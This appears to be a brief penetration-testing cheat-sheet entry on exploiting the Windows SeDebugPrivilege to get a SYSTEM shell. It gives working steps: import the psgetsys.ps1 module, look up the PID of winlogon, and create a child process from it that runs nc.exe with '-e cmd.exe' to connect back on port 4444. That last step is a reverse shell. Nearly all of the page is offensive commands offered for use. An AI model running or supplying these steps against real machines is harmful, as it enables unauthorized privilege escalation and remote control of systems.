SeDebugPrivilege
Most powerful privilege you can get. Easy system shell
You can update update proc attribute list with this privilege and can elevate privileges.
Use the module below to do that.
import-module .\psgetsys.ps1
Find pid of a process that is privileged.
Get-Process winlogon
Use that pid to attach & execute commands
[MyProcess]::CreateProcessFromParent("552","c:\windows\system32\cmd.exe", "/c c:\windows\temp\nc.exe 127.0.0.1 4444 -e cmd.exe")
Last updated